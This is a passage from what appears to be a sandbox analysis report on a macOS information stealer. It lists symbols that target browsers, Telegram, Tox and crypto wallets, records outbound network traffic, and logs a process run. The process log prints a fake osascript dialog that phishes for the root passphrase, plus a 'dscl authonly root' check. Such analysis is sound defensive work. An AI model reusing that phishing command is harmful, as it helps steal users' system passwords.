      _mz_zip_file_read_func
      _mz_zip_file_stat_internal
      _mz_zip_file_write_callback
      _mz_zip_file_write_func
      _mz_zip_get_archive_file_start_offset
      _mz_zip_get_archive_size
      _mz_zip_get_central_dir_size
      _mz_zip_get_cfile
      _mz_zip_get_error_string
      _mz_zip_get_file_modified_time
      _mz_zip_get_last_error
      _mz_zip_get_mode
      _mz_zip_get_type
      _mz_zip_heap_write_func
      _mz_zip_is_zip64
      _mz_zip_locate_file_binary_search
      _mz_zip_mem_read_func
      _mz_zip_peek_last_error
      _mz_zip_read_archive_data
      _mz_zip_reader_end
      _mz_zip_reader_end_internal
      _mz_zip_reader_extract_file_iter_new
      _mz_zip_reader_extract_file_to_callback
      _mz_zip_reader_extract_file_to_cfile
      _mz_zip_reader_extract_file_to_file
      _mz_zip_reader_extract_file_to_heap
      _mz_zip_reader_extract_file_to_mem
      _mz_zip_reader_extract_file_to_mem_no_alloc
      _mz_zip_reader_extract_iter_free
      _mz_zip_reader_extract_iter_new
      _mz_zip_reader_extract_iter_read
      _mz_zip_reader_extract_to_callback
      _mz_zip_reader_extract_to_cfile
      _mz_zip_reader_extract_to_file
      _mz_zip_reader_extract_to_heap
      _mz_zip_reader_extract_to_mem
      _mz_zip_reader_extract_to_mem_no_alloc
      _mz_zip_reader_extract_to_mem_no_alloc1
      _mz_zip_reader_file_stat
      _mz_zip_reader_get_filename
      _mz_zip_reader_get_num_files
      _mz_zip_reader_init
      _mz_zip_reader_init_cfile
      _mz_zip_reader_init_file
      _mz_zip_reader_init_file_v2
      _mz_zip_reader_init_file_v2_rpb
      _mz_zip_reader_init_internal
      _mz_zip_reader_init_mem
      _mz_zip_reader_is_file_a_directory
      _mz_zip_reader_is_file_encrypted
      _mz_zip_reader_is_file_supported
      _mz_zip_reader_locate_file
      _mz_zip_reader_locate_file_v2
      _mz_zip_reader_locate_header_sig
      _mz_zip_reader_read_central_dir
      _mz_zip_reader_sort_central_dir_offsets_by_filename
      _mz_zip_set_file_times
      _mz_zip_set_last_error
      _mz_zip_time_t_to_dos_time
      _mz_zip_validate_archive
      _mz_zip_validate_file
      _mz_zip_validate_file_archive
      _mz_zip_validate_mem_archive
      _mz_zip_writer_add_cfile
      _mz_zip_writer_add_file
      _mz_zip_writer_add_from_zip_reader
      _mz_zip_writer_add_mem
      _mz_zip_writer_add_mem_ex
      _mz_zip_writer_add_mem_ex_v2
      _mz_zip_writer_add_put_buf_callback
      _mz_zip_writer_add_read_buf_callback
      _mz_zip_writer_add_to_central_dir
      _mz_zip_writer_compute_padding_needed_for_file_alignment
      _mz_zip_writer_create_central_dir_header
      _mz_zip_writer_create_local_dir_header
      _mz_zip_writer_create_zip64_extra_data
      _mz_zip_writer_end
      _mz_zip_writer_end_internal
      _mz_zip_writer_finalize_archive
      _mz_zip_writer_finalize_heap_archive
      _mz_zip_writer_init
      _mz_zip_writer_init_cfile
      _mz_zip_writer_init_file
      _mz_zip_writer_init_file_v2
      _mz_zip_writer_init_from_reader
      _mz_zip_writer_init_from_reader_v2
      _mz_zip_writer_init_from_reader_v2_noreopen
      _mz_zip_writer_init_heap
      _mz_zip_writer_init_heap_v2
      _mz_zip_writer_init_v2
      _mz_zip_writer_update_zip64_extension_block
      _mz_zip_writer_validate_archive_name
      _mz_zip_writer_write_zeros
      _mz_zip_zero_struct
      _names
      _open
      _opendir
      _parseFF
      _parse_steam
      _pclose
      _pikfolder
      _plugin_paths
      _popen
      _pwd_getted
      _read
      _readdir
      _readwrite
      _realloc
      _remove
      _s_tdefl_large_dist_extra
      _s_tdefl_large_dist_sym
      _s_tdefl_len_extra
      _s_tdefl_len_sym
      _s_tdefl_num_probes
      _s_tdefl_packed_code_size_syms_swizzle
      _s_tdefl_small_dist_extra
      _s_tdefl_small_dist_sym
      _send
      _send_data_via_http
      _snprintf
      _socket
      _stat
      _strlen
      _tcc
      _tdefl_calculate_minimum_redundancy
      _tdefl_compress
      _tdefl_compress_block
      _tdefl_compress_buffer
      _tdefl_compress_fast
      _tdefl_compress_lz_codes
      _tdefl_compress_mem_to_heap
      _tdefl_compress_mem_to_mem
      _tdefl_compress_mem_to_output
      _tdefl_compress_normal
      _tdefl_compressor_alloc
      _tdefl_compressor_free
      _tdefl_create_comp_flags_from_zip_params
      _tdefl_flush_block
      _tdefl_flush_output_buffer
      _tdefl_get_adler32
      _tdefl_get_prev_return_status
      _tdefl_huffman_enforce_max_code_size
      _tdefl_init
      _tdefl_optimize_huffman_table
      _tdefl_output_buffer_putter
      _tdefl_radix_sort_syms
      _tdefl_start_dynamic_block
      _tdefl_start_static_block
      _tdefl_write_image_to_png_file_in_memory
      _tdefl_write_image_to_png_file_in_memory_ex
      _tdefl_write_image_to_png_file_in_memory_ex.chans
      _tdefl_write_image_to_png_file_in_memory_ex.s_tdefl_png_num_probes
      _time
      _tinfl_decompress
      _tinfl_decompress.s_dist_base
      _tinfl_decompress.s_dist_extra
      _tinfl_decompress.s_length_base
      _tinfl_decompress.s_length_dezigzag
      _tinfl_decompress.s_length_extra
      _tinfl_decompress.s_min_table_sizes
      _tinfl_decompress_mem_to_callback
      _tinfl_decompress_mem_to_heap
      _tinfl_decompress_mem_to_mem
      _tinfl_decompressor_alloc
      _tinfl_decompressor_free
      _userinfo
      _utime
      _writeall
      _writetext
      _zip
      dyld_stub_binding_helper
      start

      General Information for header 2
      Endian:little-endian
      Size:64-bit
      Architecture:arm64
      Filetype:execute
      Nbr. of load commands:17
      Entry point:0x1FFA8
      segment_command_64 aggregated: 5
      NameValue
      segname__PAGEZERO
      vmaddr0x0
      vmsize0x100000000
      fileoff0x0
      filesize0x0
      maxprot0x0
      initprot0x0
      nsects0
      flags0x0
      NameValue
      segname__TEXT
      vmaddr0x100000000
      vmsize0x28000
      fileoff0x0
      filesize0x28000
      maxprot0x5
      initprot0x5
      nsects6
      flags0x0
      Datas
      sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
      __text__TEXT0x1000035880x21B6C0x35885.88820x20x000x80000400
      __stubs__TEXT0x1000250F40x1D40x250F43.70940x20x000x80000408
      __stub_helper__TEXT0x1000252C80x1EC0x252C83.75410x20x000x80000400
      __const__TEXT0x1000254B40x14300x254B45.00330x20x000x0
      __cstring__TEXT0x1000268E40x152B0x268E45.09250x00x000x2
      __unwind_info__TEXT0x100027E100x1F00x27E104.76360x20x000x0
      NameValue
      segname__DATA_CONST
      vmaddr0x100028000
      vmsize0x4000
      fileoff0x28000
      filesize0x4000
      maxprot0x3
      initprot0x3
      nsects1
      flags0x10
      Datas
      sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
      __got__DATA_CONST0x1000280000x200x28000-0.00000x30x000x6
      NameValue
      segname__DATA
      vmaddr0x10002C000
      vmsize0x4000
      fileoff0x2C000
      filesize0x4000
      maxprot0x3
      initprot0x3
      nsects4
      flags0x0
      Datas
      sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
      __la_symbol_ptr__DATA0x10002C0000x1380x2C0002.77740x30x000x7
      __data__DATA0x10002C1380x8DB0x2C1384.54880x30x000x0
      __common__DATA0x10002CC000x4700x00.00000x90x000x1
      __bss__DATA0x10002D0700x80x00.00000x30x000x1
      NameValue
      segname__LINKEDIT
      vmaddr0x100030000
      vmsize0x4000
      fileoff0x30000
      filesize0x3EB6
      maxprot0x1
      initprot0x1
      nsects0
      flags0x0
      dyld_info_command aggregated: 1
      NameValue
      rebase_off196608
      rebase_size16
      bind_off196624
      bind_size80
      weak_bind_off0
      weak_bind_size0
      lazy_bind_off196704
      lazy_bind_size592
      export_off197296
      export_size2936
      symtab_command aggregated: 1
      NameValue
      symoff200560
      nsyms264
      stroff205112
      strsize5768
      dysymtab_command aggregated: 1
      NameValue
      ilocalsym0
      nlocalsym63
      iextdefsym63
      nextdefsym158
      iundefsym221
      nundefsym43
      tocoff0
      ntoc0
      modtaboff0
      nmodtab0
      extrefsymoff0
      nextrefsyms0
      indirectsymoff204784
      nindirectsyms82
      extreloff0
      nextrel0
      locreloff0
      nlocrel0
      dylinker_command aggregated: 1
      NameValue
      name12
      Datas/usr/lib/dyld
      uuid_command aggregated: 1
      NameValue
      uuidb'\xc3B\xa3YMA0\xab\xb6\xb0\x8b\x9d\xfc\xce\x1e\xae'
      build_version_command aggregated: 1
      NameValue
      platform1
      minos720896
      sdk852224
      ntools1
      Datas.
      source_version_command aggregated: 1
      NameValue
      version0
      entry_point_command aggregated: 1
      NameValue
      entryoff130984
      stacksize0
      dylib_command aggregated: 1
      NameValue
      name24
      timestampThu Jan 1 01:00:02 1970
      current_version1319.0.0
      compatibility_version1.0.0
      Datas/usr/lib/libSystem.B.dylib
      linkedit_data_command aggregated: 3
      NameValue
      dataoff200232
      datasize328
      NameValue
      dataoff200560
      datasize0
      NameValue
      dataoff210880
      datasize1782
      Internal Symbols
      _GrabFolder
      _GrabTox
      _SearchAndGrabChromium
      _Telegram
      ___assert_rtn
      ___chkstk_darwin
      ___stack_chk_fail
      ___stack_chk_guard
      __dyld_private
      __free
      __getenv
      __malloc
      __memcpy
      __memset
      __mh_execute_header
      __strcat
      __strcmp
      __strcpy
      __strlen
      __strncmp
      __strpbrk
      __strtok
      __strtok.next_token
      _bzero
      _checkvalid
      _close
      _closedir
      _connect
      _environ
      _exec
      _fclose
      _ff_parsedata
      _fflush
      _fgmode
      _fopen
      _fread
      _free
      _free_list
      _freopen
      _fseeko
      _fsize
      _ftello
      _fwrite
      _getPlugWallets
      _getpagesize
      _getpwd
      _inet_addr
      _is_directory
      _localtime
      _main
      _malloc
      _masterpass
      _memcmp
      _memcpy
      _memset
      _miniz_def_alloc_func
      _miniz_def_free_func
      _miniz_def_realloc_func
      _mktime
      _mmap
      _mz_adler32
      _mz_bitmasks
      _mz_compress
      _mz_compress2
      _mz_compressBound
      _mz_crc32
      _mz_crc32.s_crc_table
      _mz_deflate
      _mz_deflateBound
      _mz_deflateEnd
      _mz_deflateInit
      _mz_deflateInit2
      _mz_deflateReset
      _mz_error
      _mz_error.s_error_descs
      _mz_file_read_func_stdio
      _mz_free
      _mz_inflate
      _mz_inflateEnd
      _mz_inflateInit
      _mz_inflateInit2
      _mz_inflateReset
      _mz_uncompress
      _mz_uncompress2
      _mz_version
      _mz_zip_add_mem_to_archive_file_in_place
      _mz_zip_add_mem_to_archive_file_in_place_v2
      _mz_zip_array_ensure_capacity
      _mz_zip_clear_last_error
      _mz_zip_compute_crc32_callback
      _mz_zip_dos_to_time_t
      _mz_zip_end
      _mz_zip_extract_archive_file_to_heap
      _mz_zip_extract_archive_file_to_heap_v2
      _mz_zip_file_read_func
      _mz_zip_file_stat_internal
      _mz_zip_file_write_callback
      _mz_zip_file_write_func
      _mz_zip_get_archive_file_start_offset
      _mz_zip_get_archive_size
      _mz_zip_get_central_dir_size
      _mz_zip_get_cfile
      _mz_zip_get_error_string
      _mz_zip_get_file_modified_time
      _mz_zip_get_last_error
      _mz_zip_get_mode
      _mz_zip_get_type
      _mz_zip_heap_write_func
      _mz_zip_is_zip64
      _mz_zip_locate_file_binary_search
      _mz_zip_mem_read_func
      _mz_zip_peek_last_error
      _mz_zip_read_archive_data
      _mz_zip_reader_end
      _mz_zip_reader_end_internal
      _mz_zip_reader_extract_file_iter_new
      _mz_zip_reader_extract_file_to_callback
      _mz_zip_reader_extract_file_to_cfile
      _mz_zip_reader_extract_file_to_file
      _mz_zip_reader_extract_file_to_heap
      _mz_zip_reader_extract_file_to_mem
      _mz_zip_reader_extract_file_to_mem_no_alloc
      _mz_zip_reader_extract_iter_free
      _mz_zip_reader_extract_iter_new
      _mz_zip_reader_extract_iter_read
      _mz_zip_reader_extract_to_callback
      _mz_zip_reader_extract_to_cfile
      _mz_zip_reader_extract_to_file
      _mz_zip_reader_extract_to_heap
      _mz_zip_reader_extract_to_mem
      _mz_zip_reader_extract_to_mem_no_alloc
      _mz_zip_reader_extract_to_mem_no_alloc1
      _mz_zip_reader_file_stat
      _mz_zip_reader_get_filename
      _mz_zip_reader_get_num_files
      _mz_zip_reader_init
      _mz_zip_reader_init_cfile
      _mz_zip_reader_init_file
      _mz_zip_reader_init_file_v2
      _mz_zip_reader_init_file_v2_rpb
      _mz_zip_reader_init_internal
      _mz_zip_reader_init_mem
      _mz_zip_reader_is_file_a_directory
      _mz_zip_reader_is_file_encrypted
      _mz_zip_reader_is_file_supported
      _mz_zip_reader_locate_file
      _mz_zip_reader_locate_file_v2
      _mz_zip_reader_locate_header_sig
      _mz_zip_reader_read_central_dir
      _mz_zip_reader_sort_central_dir_offsets_by_filename
      _mz_zip_set_file_times
      _mz_zip_set_last_error
      _mz_zip_time_t_to_dos_time
      _mz_zip_validate_archive
      _mz_zip_validate_file
      _mz_zip_validate_file_archive
      _mz_zip_validate_mem_archive
      _mz_zip_writer_add_cfile
      _mz_zip_writer_add_file
      _mz_zip_writer_add_from_zip_reader
      _mz_zip_writer_add_mem
      _mz_zip_writer_add_mem_ex
      _mz_zip_writer_add_mem_ex_v2
      _mz_zip_writer_add_put_buf_callback
      _mz_zip_writer_add_read_buf_callback
      _mz_zip_writer_add_to_central_dir
      _mz_zip_writer_compute_padding_needed_for_file_alignment
      _mz_zip_writer_create_central_dir_header
      _mz_zip_writer_create_local_dir_header
      _mz_zip_writer_create_zip64_extra_data
      _mz_zip_writer_end
      _mz_zip_writer_end_internal
      _mz_zip_writer_finalize_archive
      _mz_zip_writer_finalize_heap_archive
      _mz_zip_writer_init
      _mz_zip_writer_init_cfile
      _mz_zip_writer_init_file
      _mz_zip_writer_init_file_v2
      _mz_zip_writer_init_from_reader
      _mz_zip_writer_init_from_reader_v2
      _mz_zip_writer_init_from_reader_v2_noreopen
      _mz_zip_writer_init_heap
      _mz_zip_writer_init_heap_v2
      _mz_zip_writer_init_v2
      _mz_zip_writer_update_zip64_extension_block
      _mz_zip_writer_validate_archive_name
      _mz_zip_writer_write_zeros
      _mz_zip_zero_struct
      _names
      _open
      _opendir
      _parseFF
      _parse_steam
      _pclose
      _pikfolder
      _plugin_paths
      _popen
      _pwd_getted
      _read
      _readdir
      _readwrite
      _realloc
      _remove
      _s_tdefl_large_dist_extra
      _s_tdefl_large_dist_sym
      _s_tdefl_len_extra
      _s_tdefl_len_sym
      _s_tdefl_num_probes
      _s_tdefl_packed_code_size_syms_swizzle
      _s_tdefl_small_dist_extra
      _s_tdefl_small_dist_sym
      _send
      _send_data_via_http
      _snprintf
      _socket
      _stat
      _strlen
      _tcc
      _tdefl_calculate_minimum_redundancy
      _tdefl_compress
      _tdefl_compress_block
      _tdefl_compress_buffer
      _tdefl_compress_lz_codes
      _tdefl_compress_mem_to_heap
      _tdefl_compress_mem_to_mem
      _tdefl_compress_mem_to_output
      _tdefl_compress_normal
      _tdefl_compressor_alloc
      _tdefl_compressor_free
      _tdefl_create_comp_flags_from_zip_params
      _tdefl_flush_block
      _tdefl_flush_output_buffer
      _tdefl_get_adler32
      _tdefl_get_prev_return_status
      _tdefl_huffman_enforce_max_code_size
      _tdefl_init
      _tdefl_optimize_huffman_table
      _tdefl_output_buffer_putter
      _tdefl_radix_sort_syms
      _tdefl_start_dynamic_block
      _tdefl_start_static_block
      _tdefl_write_image_to_png_file_in_memory
      _tdefl_write_image_to_png_file_in_memory_ex
      _tdefl_write_image_to_png_file_in_memory_ex.chans
      _tdefl_write_image_to_png_file_in_memory_ex.s_tdefl_png_num_probes
      _time
      _tinfl_decompress
      _tinfl_decompress.s_dist_base
      _tinfl_decompress.s_dist_extra
      _tinfl_decompress.s_length_base
      _tinfl_decompress.s_length_dezigzag
      _tinfl_decompress.s_length_extra
      _tinfl_decompress.s_min_table_sizes
      _tinfl_decompress_mem_to_callback
      _tinfl_decompress_mem_to_heap
      _tinfl_decompress_mem_to_mem
      _tinfl_decompressor_alloc
      _tinfl_decompressor_free
      _userinfo
      _utime
      _writeall
      _writetext
      _zip
      dyld_stub_binder
      External Symbols
      ___assert_rtn
      ___stack_chk_fail
      _bzero
      _close
      _closedir
      _connect
      _fclose
      _fflush
      _fopen
      _fread
      _free
      _freopen
      _fseeko
      _ftello
      _fwrite
      _getpagesize
      _inet_addr
      _localtime
      _malloc
      _memcmp
      _memcpy
      _memset
      _mktime
      _mmap
      _open
      _opendir
      _pclose
      _popen
      _read
      _readdir
      _realloc
      _remove
      _send
      _snprintf
      _socket
      _stat
      _strlen
      _time
      _utime

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Oct 10, 2023 20:29:40.968908072 CEST4937380192.168.11.1117.253.83.202
      Oct 10, 2023 20:29:41.134790897 CEST804937317.253.83.202192.168.11.11
      Oct 10, 2023 20:29:41.135526896 CEST4937380192.168.11.1117.253.83.202
      Oct 10, 2023 20:30:10.970803022 CEST4937480192.168.11.1123.47.151.53
      Oct 10, 2023 20:30:11.137202978 CEST804937423.47.151.53192.168.11.11
      Oct 10, 2023 20:30:11.137953043 CEST4937480192.168.11.1123.47.151.53
      Oct 10, 2023 20:32:00.238451004 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.238574028 CEST44349398100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:00.239126921 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.239928007 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.240001917 CEST44349398100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:00.667278051 CEST44349398100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:00.669224977 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.669430971 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.701082945 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.701365948 CEST44349398100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:00.701982975 CEST44349398100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:00.702116966 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.702990055 CEST49398443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.712598085 CEST49400443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.712718964 CEST44349400100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:00.713449955 CEST49400443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.714247942 CEST49400443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:00.714308023 CEST44349400100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:01.126565933 CEST44349400100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:01.128273010 CEST49400443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:01.128703117 CEST49400443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:01.142936945 CEST49400443192.168.11.11100.22.10.168
      Oct 10, 2023 20:32:01.143170118 CEST44349400100.22.10.168192.168.11.11
      Oct 10, 2023 20:32:01.143783092 CEST49400443192.168.11.11100.22.10.168

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Oct 10, 2023 20:29:38.499535084 CEST53521261.1.1.1192.168.11.11
      Oct 10, 2023 20:30:42.503539085 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:30:42.503699064 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:30:42.504388094 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:35.737001896 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:35.737289906 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:35.737848043 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:35.738249063 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:35.738298893 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:36.486726046 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:36.487256050 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:36.487809896 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:37.235595942 CEST137137192.168.11.11192.168.11.255
      Oct 10, 2023 20:31:37.235810041 CEST137137192.168.11.11192.168.11.255

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Oct 10, 2023 20:32:00.236066103 CEST1.1.1.1192.168.11.110x4116No error (0)pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com100.22.10.168A (IP address)IN (0x0001)false
      Oct 10, 2023 20:32:00.236066103 CEST1.1.1.1192.168.11.110x4116No error (0)pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com44.235.78.64A (IP address)IN (0x0001)false
      Oct 10, 2023 20:32:00.236066103 CEST1.1.1.1192.168.11.110x4116No error (0)pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com44.232.224.125A (IP address)IN (0x0001)false

      System Behavior

      General

      Start time (UTC):18:29:18
      Start date (UTC):10/10/2023
      Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
      Arguments:-
      File size:3722408 bytes
      MD5 hash:8910349f44a940d8d79318367855b236

      Chronological Activities

      General

      Start time (UTC):18:29:18
      Start date (UTC):10/10/2023
      Path:/Users/berri/Desktop/1rNsYj4HBT
      Arguments:/Users/berri/Desktop/1rNsYj4HBT
      File size:442038 bytes
      MD5 hash:a1a7891c4b4cd308e31c2c62860c8581

      Chronological Activities

      General

      Start time (UTC):18:29:18
      Start date (UTC):10/10/2023
      Path:/bin/sh
      Arguments:-
      File size:618512 bytes
      MD5 hash:8aa60b22a5d30418a002b340989384dc

      Chronological Activities

      General

      Start time (UTC):18:29:18
      Start date (UTC):10/10/2023
      Path:/usr/bin/dscl
      Arguments:dscl . authonly root
      File size:202560 bytes
      MD5 hash:2072d2ac07a471913b06fed4b4bd55cf

      Chronological Activities

      General

      Start time (UTC):18:29:18
      Start date (UTC):10/10/2023
      Path:/bin/sh
      Arguments:-
      File size:618512 bytes
      MD5 hash:8aa60b22a5d30418a002b340989384dc

      Chronological Activities

      General

      Start time (UTC):18:29:18
      Start date (UTC):10/10/2023
      Path:/usr/bin/osascript
      Arguments:osascript -e display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answer
      File size:43136 bytes
      MD5 hash:86c0eb9ab6768a4a8e723dcda40bc65a

      Chronological Activities